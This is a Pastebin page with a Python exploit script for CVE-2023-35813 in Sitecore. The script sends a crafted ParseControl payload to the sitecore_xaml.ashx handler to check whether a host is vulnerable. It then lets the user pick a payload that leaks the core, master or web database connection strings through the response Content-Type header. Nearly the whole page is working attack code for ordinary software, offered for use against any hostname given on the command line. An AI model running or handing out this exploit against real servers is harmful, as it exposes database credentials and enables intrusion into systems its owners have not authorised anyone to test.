Advertisement
FlyFar

Sitecore - Remote Code Execution v8.2 - CVE-2023-35813

Mar 12th, 2024
713
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.01 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python3
  2. #
  3. # Exploit Title: Sitecore - Remote Code Execution v8.2
  4. # Exploit Author: abhishek morla
  5. # Google Dork: N/A
  6. # Date: 2024-01-08
  7. # Vendor Homepage: https://www.sitecore.com/
  8. # Software Link: https://dev.sitecore.net/
  9. # Version: 10.3
  10. # Tested on: windows64bit / mozila firefox
  11. # CVE : CVE-2023-35813
  12. # The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted
  13. # Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09
  14. # Video POC : https://youtu.be/vWKl9wgdTB0
  15.  
  16. import argparse
  17. import requests
  18. from urllib.parse import quote
  19. from rich.console import Console
  20.  
  21. console = Console()
  22. def initial_test(hostname):
  23.     # Initial payload to test vulnerability
  24.     test_payload = '''
  25.    <%@Register
  26.        TagPrefix = 'x'
  27.        Namespace = 'System.Runtime.Remoting.Services'
  28.        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
  29.    %>
  30.    <x:RemotingService runat='server'
  31.    Context-Response-ContentType='TestVulnerability'
  32.    />
  33.    '''
  34.     encoded_payload = quote(test_payload)
  35.  
  36.     url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
  37.     headers = {"Content-Type": "application/x-www-form-urlencoded"}
  38.     data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)
  39.  
  40.     response = requests.post(url, headers=headers, data=data, verify=False)
  41.  
  42.     # Check for the test string in the Content-Type of the response
  43.     return 'TestVulnerability' in response.headers.get('Content-Type', '')
  44.  
  45. def get_payload(choice):
  46.     # Payload templates for different options
  47.     payloads = {
  48.         '1': "<%$ ConnectionStrings:core %>",
  49.         '2': "<%$ ConnectionStrings:master %>",
  50.         '3': "<%$ ConnectionStrings:web %>"
  51.     }
  52.  
  53.     base_payload = '''
  54.    <%@Register
  55.        TagPrefix = 'x'
  56.        Namespace = 'System.Runtime.Remoting.Services'
  57.        Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
  58.    %>
  59.    <x:RemotingService runat='server'
  60.    Context-Response-ContentType='{}'
  61.    />
  62.    '''
  63.  
  64.     return base_payload.format(payloads.get(choice, "Invalid"))
  65.  
  66. def main(hostname):
  67.     if initial_test(hostname):
  68.         print("Exploiting, Please wait...")
  69.         console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]")
  70.         print("Select the payload to use:")
  71.         print("1: Core connection strings")
  72.         print("2: Master connection strings")
  73.         print("3: Web connection strings")
  74.         payload_choice = input("Enter your choice (1, 2, or 3): ")
  75.  
  76.         payload = get_payload(payload_choice)
  77.         encoded_payload = quote(payload)
  78.  
  79.         url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
  80.         headers = {"Content-Type": "application/x-www-form-urlencoded"}
  81.         data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)
  82.  
  83.         response = requests.post(url, headers=headers, data=data)
  84.  
  85.         if 'Content-Type' in response.headers:
  86.             print("Content-Type from the response header:")
  87.             print("\n")
  88.             print(response.headers['Content-Type'])
  89.         else:
  90.             print("No Content-Type in the response header. Status Code:", response.status_code)
  91.     else:
  92.         print("The target does not appear to be vulnerable to CVE-2023-35813.")
  93.  
  94.  
  95. if __name__ == "__main__":
  96.     console.print("[bold green]Author: Abhishek Morla[/bold green]")
  97.     console.print("[bold red]CVE-2023-35813[/bold red]")
  98.     parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore')
  99.     parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance')
  100.     args = parser.parse_args()
  101.  
  102.     main(args.hostname)
  103.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement